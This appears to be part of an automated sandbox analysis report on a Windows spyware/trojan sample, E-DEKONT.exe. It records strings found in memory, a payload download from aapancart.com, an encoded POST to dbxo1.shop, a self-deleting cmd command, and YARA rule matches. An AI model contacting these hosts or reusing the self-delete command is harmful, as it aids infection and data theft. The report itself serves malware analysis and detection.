00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 
00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
                  Source: E-DEKONT.exe, 00000004.00000001.108602358770.0000000000626000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
                  Source: mozglue.dll.4.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 
00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
                  Source: E-DEKONT.exe, 00000004.00000001.108602069162.00000000005F2000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
                  Source: E-DEKONT.exe, 00000004.00000001.108602069162.00000000005F2000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
                  Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/DOHx
                  Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/qO
                  Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rar
                  Source: E-DEKONT.exe, 00000004.00000002.108992381204.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rarzJ
                  Source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
                  Source: 444685002784711619507383.tmp.4.dr String found in binary or memory: https://login.live.com/
                  Source: E-DEKONT.exe, 00000004.00000003.108965513435.0000000001AD1000.00000004.00000020.00020000.00000000.sdmp, 444685002784711619507383.tmp.4.dr String found in binary or memory: https://login.live.com//
                  Source: 444685002784711619507383.tmp.4.dr String found in binary or memory: https://login.live.com/https://login.live.com/
                  Source: E-DEKONT.exe, 00000004.00000003.108965513435.0000000001AD1000.00000004.00000020.00020000.00000000.sdmp, 444685002784711619507383.tmp.4.dr String found in binary or memory: https://login.live.com/v104
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934436696.000000001DDF4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 
00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: unknown HTTP traffic detected: POST /db1/index.php HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                      Host: dbxo1.shop
                      Content-Length: 103
                      Cache-Control: no-cache
                      Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 34 70 9d 33 70 9d 36 13 ec 47 70 9d 31 11 8b 31 11 eb 46 16 8b 30 63 8b 30 6c 8b 30 63 eb 40
                      Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp4p3p6Gp11F0c0l0c@
                  Source: unknown DNS traffic detected: queries for: aapancart.com
                  Source: global traffic HTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: aapancart.com
                      Cache-Control: no-cache
                  Source: unknown HTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49851 version: TLS 1.2
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405425

                  System Summary

                  Source: 4.2.E-DEKONT.exe.1df8883c.5.raw.unpack, type: UNPACKEDPE, Matched rule: OlympicDestroyer Payload, Author: kevoreilly
                  Source: 4.2.E-DEKONT.exe.1df32afc.3.raw.unpack, type: UNPACKEDPE, Matched rule: OlympicDestroyer Payload, Author: kevoreilly
                  Source: 4.2.E-DEKONT.exe.1df37450.4.raw.unpack, type: UNPACKEDPE, Matched rule: OlympicDestroyer Payload, Author: kevoreilly
                  Source: E-DEKONT.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 4.2.E-DEKONT.exe.1df8883c.5.raw.unpack, type: UNPACKEDPE, Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: 4.2.E-DEKONT.exe.1df32afc.3.raw.unpack, type: UNPACKEDPE, Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: 4.2.E-DEKONT.exe.1df37450.4.raw.unpack, type: UNPACKEDPE, Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                  Source: C:\Users\user\Desktop\E-DEKONT.exe, Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                  Source: C:\Users\user\Desktop\E-DEKONT.exe, Code function: 1_2_02B84F02 NtProtectVirtualMemory
                  Source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-heap-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-util-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-errorhandling-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-console-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l2-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-timezone-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-synch-l1-2-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-locale-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-profile-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-handle-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-debug-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-string-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-localization-l1-2-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-utility-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-datetime-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-time-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-convert-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-math-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-conio-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-string-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-heap-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-file-l1-2-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-process-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-memory-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-private-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-environment-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr, Static PE information: No import functions for PE file found
                  Source: E-DEKONT.exe, memory dumps (.sdmp), Binary or memory string: OriginalFilename apisetstub vs E-DEKONT.exe
                  Source: E-DEKONT.exe, memory dumps (.sdmp), Binary or memory string: OriginalFilename msvcp140.dll vs E-DEKONT.exe
                  Source: E-DEKONT.exe, memory dumps (.sdmp), Binary or memory string: OriginalFilename nss3.dll vs E-DEKONT.exe
                  Source: E-DEKONT.exe, memory dumps (.sdmp), Binary or memory string: OriginalFilename nssdbm3.dll vs E-DEKONT.exe
                  Source: E-DEKONT.exe, memory dumps (.sdmp), Binary or memory string: OriginalFilename softokn3.dll vs E-DEKONT.exe
                  Source: E-DEKONT.exe, memory dumps (.sdmp), Binary or memory string: OriginalFilename ucrtbase.dll vs E-DEKONT.exe
                  Source: E-DEKONT.exe, memory dumps (.sdmp), Binary or memory string: OriginalFilename mozglue.dll vs E-DEKONT.exe
                  Source: E-DEKONT.exe, memory dumps (.sdmp), Binary or memory string: OriginalFilename freebl3.dll vs E-DEKONT.exe
                  Source: E-DEKONT.exe, memory dumps (.sdmp), Binary or memory string: OriginalFilename vcruntime140.dll vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108944687963.000000001E79C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108904797866.000000001DDC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108911467372.000000001DDCC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108899797081.000000001DDCC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs E-DEKONT.exe
                  Source: E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs E-DEKONT.exe
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Section loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Section loaded: crtdll.dll
                  Source: C:\Windows\SysWOW64\timeout.exe Section loaded: edgegdi.dll
                  Source: E-DEKONT.exe Virustotal: Detection: 26%
                  Source: E-DEKONT.exe ReversingLabs: Detection: 20%
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File read: C:\Users\user\Desktop\E-DEKONT.exe
                  Source: E-DEKONT.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown Process created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exe
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exe
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403373
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\nsq7CBC.tmp
                  Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@8/55@2/2
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_004020FE CoCreateInstance,1_2_004020FE
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_004046E6
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
